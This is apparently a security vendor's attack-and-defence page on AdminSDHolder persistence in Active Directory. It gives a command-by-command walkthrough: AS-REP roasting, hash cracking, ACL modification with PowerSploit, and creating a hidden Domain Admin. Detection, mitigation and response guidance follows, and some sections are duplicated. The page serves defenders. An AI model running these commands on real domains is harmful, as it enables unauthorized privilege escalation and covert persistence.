Netwrix Auditor 
Netwrix Change Tracker 
Netwrix Data Classification 
Netwrix Password Policy Enforcer 
Netwrix Password Reset 
Netwrix PolicyPak 
Netwrix SbPAM 
Netwrix StealthAUDIT 
Netwrix StealthDEFEND 
Netwrix StealthINTERCEPT 
Netwrix StealthRECOVER 
AdminSDHolder Attack
AdminSDHolder modification is a persistence technique in which an attacker abuses the SDProp process in Active Directory to establish a persistent backdoor to Active Directory. Each hour (by default), SDProp compares the permissions on protected objects (e.g., Users with Domain Admin Privileges) in Active Directory with those defined on a special container called AdminSDHolder. If they differ, it replaces the permissions on the protected object with those defined on AdminSDHolder. Therefore, an adversary who modifies the AdminSDHolder container can establish a path of shadow administration and a means to regain administrative access to Active Directory.
Threat Summary
Target:
Active Directory
Tools:
ATT&CK® Tactic:
ATT&CK Technique:
N/A
Difficulty
Detection:
Low
Mitigation:
Medium
Response:
Low
Attack Tutorial: How the AdminSDHolder Modification Attack Works
STEP 1
Acquire the required privileges
Before an adversary can modify the AdminSDHolder container, they must gain administrative privilege in the domain. In the example below, the adversary utilizes the Rubeus tool to AS-REP roast a privileged user (JoeD) with Kerberos pre-authentication disabled.
PS> .\Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat
[*] Action: AS-REP roasting
[*] Target Domain : domain.com
[*] Target DC : dc1
[*] Searching path 'LDAP://dc1/DC=domain,DC=com' for AS-REP roastable users
[*] SamAccountName : joed
[*] DistinguishedName : CN=Joe Dibley,OU=Users,OU=Admin,DC=domain,DC=com
[*] Using domain controller: dc1 (10.154.201.1)
[*] Building AS-REQ (w/o preauth) for: 'domain.com\joed'
[+] AS-REQ w/o preauth successful!
[*] Hash written to c:\Tools\Ghostpack\dotnet v4.5 compiled binaries\hashes.txt
[*] Roasted hashes written to : c:\Tools\Ghostpack\dotnet v4.5 compiled binaries\hashes.txt
PS> .\hashcat.exe -m 18200 -o cracked.txt -a 0 .\Hash.txt .\wordlist.txt
...
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$joed@domain.com:e7d1f...2ac95c
Time.Started.....: Thu Jul 23 18:58:36 2020 (0 secs)
Time.Estimated...: Thu Jul 23 18:58:36 2020 (0 secs)
Guess.Base.......: File (.\wordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 97694 H/s (0.26ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 100/100 (100.00%)
Rejected.........: 0/100 (0.00%)
Restore.Point....: 0/100 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> taylor
Hardware.Mon.#1..: Temp: 47c Fan: 34% Util: 32% Core:1265MHz Mem:2504MHz Bus:16
PS> Get-Content .\cracked.txt
$krb5asrep$23$joed@domain.com:e7d1f86a67ca41137f9a0b45d24f5795$3f8e0e7a0d8055d91a3fa2c67b537949e7dc30f41b797e01fa459d774d0c10c3fbc2488c7bb634db93118bb5a8dfe99107899f56e2542d39fef9b27d893fbaa5e92acd207b059b548d456f9daa18b24f0c9e83af16898eec8e9dbde3128772924a3f10e09cd66fbede311b3c3a4aa45d9feb6c49178dbab65dd8e38af89b3ac0fad7bde16b0bb50e25c8f6f92d29d5d3a9dc8e633e31db73dd06aa2e2a5e97053f73fada97564248d048fc74b7e13d56016210e6a3d1f4e4c7cafb60007bec16d682b3fd210bdaa1d2f3d44c717f19cf1583e814d92ace43991d132be1897ebeaa8b78daa7b29f1a3e03301c3920da1cf9bd8a887a92fc79280734e5acb2fadcfa05895f0f2ac95c:P@ssword!23
# domain\joed has a password of: P@ssword!23
STEP 2
Modify the AdminSDHolders access control list (ACL)
After successfully cracking password hash for the JoeD account obtained through AS-REP roasting, the adversary authenticates with the password and uses PowerSploit’s Add-DomainObjectACL cmdlet to grant all privileges on the AdminSDHolder container to a normal user they’d previously compromised (BobT). The next time the SDProp process runs, BobT’s new privileges will be applied to all protected objects.
PS> runas /noprofile /user:domain\joed powershell.exe
# --- New Window Opens --- #
PS> Import-Module .\PowerSploit.psd1
PS> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System' -PrincipalIdentity BobT -Rights All
PS> # Confirming Permissions Added
PS> Get-DomainObjectAcl -Identity `CN=AdminSDHolder,CN=System` -ResolveGUIDs
InheritedObjectType : All
ObjectDN : CN=AdminSDHolder,CN=System,DC=Domain,DC=com
ObjectType : All
IdentityReference : Domain\BobT
IsInherited : False
ActiveDirectoryRights : GenericAll
PropagationFlags : None
ObjectFlags : None
InheritanceFlags : None
InheritanceType : None
AccessControlType : Allow
ObjectSID :
STEP 3
Use permissions to regain access
At this stage, the adversary has control of the JoeD and BobT accounts and has created a persistence mechanism that will allow them to regain Domain Admins privileges if they lose access to JoeD. BobT is a shadow administrator of the Active Directory domain.
In this example, the adversary has lost access to JoeD’s account. Instead of having to AS-REP roast again or use some other method, the attacker can use BobT’s account to re-establish their position.
In this example, the adversary has lost access to JoeD’s account. Instead of having to AS-REP roast again or use some other method, the attacker can use BobT’s account to re-establish their position.
PS> Add-ADGroupMember -Identity "Domain Admins" -Members BobT
PS> # Re-authenticate as User1 to get updated group membership or if no password then wait until user re-autenticates
PS> runas.exe /user:domain\BobT powershell
PS> New-ADOrganizationalUnit -Path "DC=domain,DC=com" -Name "Users"
PS> New-ADUser -AccountPassword (ConvertTo-SecureString -AsPlainText -Force -String "MySimplePassword123!") -SamAccountName PaulaS -Name "Paula Smith" -DisplayName "Paula Smith" -EmailAddress "Paula.Smith@domain.com" -PasswordNeverExpires $True -Path "OU=Users,DC=domain,DC=com"
PS> Add-ADGroupMember -Identity "Domain Admins" -Members PaulaS
PS> # Hide the PaulaS and Users OU
PS> Import-Module RACE.psm1
PS> Set-ADACL -SamAccountName Everyone -Right ReadProperty -Type Deny -DistinguishedName (Get-ADUser PaulaS)
PS> Set-ADACL -SAMAccountName Everyone -Right ListChildren -Type Deny -DistinguishedName "OU=Users,DC=domain,DC=com"
PS> # Remove BobT from Domain Admins to hide privileges
PS> Remove-ADGroupMember -Identity "Domain Admins" -Members BobT
PC> Detect, Mitigate and Respond
Detect
Mitigate
Respond
Difficulty:
Low
Watching for changes to the AdminSDHolder container ACL is a good way to detect potentially malicious activity. In a normal environment, changes to AdminSDHolder should occur infrequently and follow change control processes.
Event ID 5136 in the Audit Directory Service Changes subcategory of the Windows event log monitors directory service changes. To identify changes to the AdminSDHolder container ACL, monitor events that match the ObjectDN “CN=AdminSDHolder,DC=System” and the AttributeLDAPDisplayName is ‘nTSecurityDescriptor’.
The following XPath filter can be used in the Windows Event Viewer to detect modifications to the AdminSDHolder container ACL:
Event ID 5136 in the Audit Directory Service Changes subcategory of the Windows event log monitors directory service changes. To identify changes to the AdminSDHolder container ACL, monitor events that match the ObjectDN “CN=AdminSDHolder,DC=System” and the AttributeLDAPDisplayName is ‘nTSecurityDescriptor’.
The following XPath filter can be used in the Windows Event Viewer to detect modifications to the AdminSDHolder container ACL:
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[(EventID=5136)]]
and
*[EventData[Data[@Name='ObjectDN'] and (Data='CN=AdminSDHolder,CN=System,DC=YourDomain,DC=com')]]
and
*[EventData[Data[@Name='AttributeLDAPDisplayName'] and (Data='nTSecurityDescriptor')]]
</Select>
</Query>
</QueryList>
Once you find a matching event, the AttributeValue can be decoded from its native SDDL format to human readable using PowerShell's ConvertFrom-SddlString cmdlet.
$ACL = ConvertFrom-SddlString -Sddl "O:DAG:DAD:PAI(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-5840559-2756745051-1363507867-1127)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-5840559-2756745051-1363507867-1129)(OA;;RPWP;bf967a7f-0de6-11d0-a285-00aa003049e2;;CA)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;RPWP;6db69a1c-9422-11d1-aebd-0000f80367c1;;S-1-5-32-561)(OA;;RPWP;5805bc62-bdc9-4428-a5e2-856a0f4c185e;;S-1-5-32-561)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)(OA;CI;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;LCRPRC;;;S-1-5-21-5840559-2756745051-1363507867-4102)(A;;RPWP;;;S-1-5-21-5840559-2756745051-1363507867-1127)(A;;RPWP;;;S-1-5-21-5840559-2756745051-1363507867-1129)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;DA)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;S-1-5-21-5840559-2756745051-1363507867-519)(A;;LCRPLORC;;;RU)(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:AI(AU;SA;WPWDWO;;;WD)(OU;CIIOIDSA;LCRPRC;;bf967aae-0de6-11d0-a285-00aa003049e2;WD)(OU;CIIDSA;CR;89e95b76-444d-4c62-991a-0facbeda640c;;DU)(OU;CIIDSA;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;DU)(OU;CIIDSA;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DU)(OU;CIIOIDSA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CIIOIDSA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;CIIDSA;LCRPWPRC;;;DU)"
$ACL.DiscretionaryACL
# --- Output Truncated --- #
Domain\BobT: AccessAllowed (ChangePermissions, CreateDirectories, Delete, DeleteSubdirectoriesAndFiles, ExecuteKey, FullControl, GenericAll, GenericExecute, GenericRead, GenericWrite, ListDirectory, Modify, Read, ReadAndExecute, ReadAttributes, ReadExtendedAttributes, ReadPermissions, TakeOwnership, Traverse, Write, WriteAttributes, WriteData, WriteExtendedAttributes, WriteKey)
# --- Output Truncated --- #
Difficulty:
Medium
The AdminSDHolder container is a core part of Active Directory. By default, only users with administrative privileges in Active Directory are able to modify their ACL. To mitigate the risk of unauthorized modification:
- Routinely audit AdminSDHolder permissions for unauthorized or unnecessary permissions.
- Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from the workstation to a server or domain controller. Eliminating these pathways to privilege escalation is essential.
- Aggressively enforce the principle of least privilege.
Difficulty:
Low
If unauthorized permissions are granted on the AdminSDHolder container, the following actions can be taken to respond:
- Activate the incident response process and alert the response team
- Remove the newly added ACL; if this is done before the SDProp process runs (by default every 60 minutes), no new permissions on protected objects will be propagated.
- Reset the password of the user account that performed the unauthorized modification of the AdminSDHolder container ACL. Optionally disable the user to a) force instantaneous replication to all domain controllers, and b) disrupt the adversary’s use of that account
- Quarantine the impacted machines for forensic investigation and eradication and recovery activities.
Detect
Difficulty:
Low
Watching for changes to the AdminSDHolder container ACL is a good way to detect potentially malicious activity. In a normal environment, changes to AdminSDHolder should occur infrequently and follow change control processes.
Event ID 5136 in the Audit Directory Service Changes subcategory of the Windows event log monitors directory service changes. To identify changes to the AdminSDHolder container ACL, monitor events that match the ObjectDN “CN=AdminSDHolder,DC=System” and the AttributeLDAPDisplayName is ‘nTSecurityDescriptor’.
The following XPath filter can be used in the Windows Event Viewer to detect modifications to the AdminSDHolder container ACL:
Event ID 5136 in the Audit Directory Service Changes subcategory of the Windows event log monitors directory service changes. To identify changes to the AdminSDHolder container ACL, monitor events that match the ObjectDN “CN=AdminSDHolder,DC=System” and the AttributeLDAPDisplayName is ‘nTSecurityDescriptor’.
The following XPath filter can be used in the Windows Event Viewer to detect modifications to the AdminSDHolder container ACL:
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[(EventID=5136)]]
and
*[EventData[Data[@Name='ObjectDN'] and (Data='CN=AdminSDHolder,CN=System,DC=YourDomain,DC=com')]]
and
*[EventData[Data[@Name='AttributeLDAPDisplayName'] and (Data='nTSecurityDescriptor')]]
</Select>
</Query>
</QueryList>
Once you find a matching event, the AttributeValue can be decoded from its native SDDL format to human readable using PowerShell's ConvertFrom-SddlString cmdlet.
$ACL = ConvertFrom-SddlString -Sddl "O:DAG:DAD:PAI(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-5840559-2756745051-1363507867-1127)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-5840559-2756745051-1363507867-1129)(OA;;RPWP;bf967a7f-0de6-11d0-a285-00aa003049e2;;CA)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;RPWP;6db69a1c-9422-11d1-aebd-0000f80367c1;;S-1-5-32-561)(OA;;RPWP;5805bc62-bdc9-4428-a5e2-856a0f4c185e;;S-1-5-32-561)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)(OA;CI;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;LCRPRC;;;S-1-5-21-5840559-2756745051-1363507867-4102)(A;;RPWP;;;S-1-5-21-5840559-2756745051-1363507867-1127)(A;;RPWP;;;S-1-5-21-5840559-2756745051-1363507867-1129)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;DA)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;S-1-5-21-5840559-2756745051-1363507867-519)(A;;LCRPLORC;;;RU)(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:AI(AU;SA;WPWDWO;;;WD)(OU;CIIOIDSA;LCRPRC;;bf967aae-0de6-11d0-a285-00aa003049e2;WD)(OU;CIIDSA;CR;89e95b76-444d-4c62-991a-0facbeda640c;;DU)(OU;CIIDSA;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;DU)(OU;CIIDSA;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DU)(OU;CIIOIDSA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CIIOIDSA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;CIIDSA;LCRPWPRC;;;DU)"
$ACL.DiscretionaryACL
# --- Output Truncated --- #
Domain\BobT: AccessAllowed (ChangePermissions, CreateDirectories, Delete, DeleteSubdirectoriesAndFiles, ExecuteKey, FullControl, GenericAll, GenericExecute, GenericRead, GenericWrite, ListDirectory, Modify, Read, ReadAndExecute, ReadAttributes, ReadExtendedAttributes, ReadPermissions, TakeOwnership, Traverse, Write, WriteAttributes, WriteData, WriteExtendedAttributes, WriteKey)
# --- Output Truncated --- #
Mitigate
Difficulty:
Medium
The AdminSDHolder container is a core part of Active Directory. By default, only users with administrative privileges in Active Directory are able to modify their ACL. To mitigate the risk of unauthorized modification:
- Routinely audit AdminSDHolder permissions for unauthorized or unnecessary permissions.
- Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from the workstation to a server or domain controller. Eliminating these pathways to privilege escalation is essential.
- Aggressively enforce the principle of least privilege.
Respond
Difficulty:
Low
If unauthorized permissions are granted on the AdminSDHolder container, the following actions can be taken to respond:
- Activate the incident response process and alert the response team
- Remove the newly added ACL; if this is done before the SDProp process runs (by default every 60 minutes), no new permissions on protected objects will be propagated.
- Reset the password of the user account that performed the unauthorized modification of the AdminSDHolder container ACL. Optionally disable the user to a) force instantaneous replication to all domain controllers, and b) disrupt the adversary’s use of that account
- Quarantine the impacted machines for forensic investigation and eradication and recovery activities.
Featured Solutions
OTHER ATTACKS
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.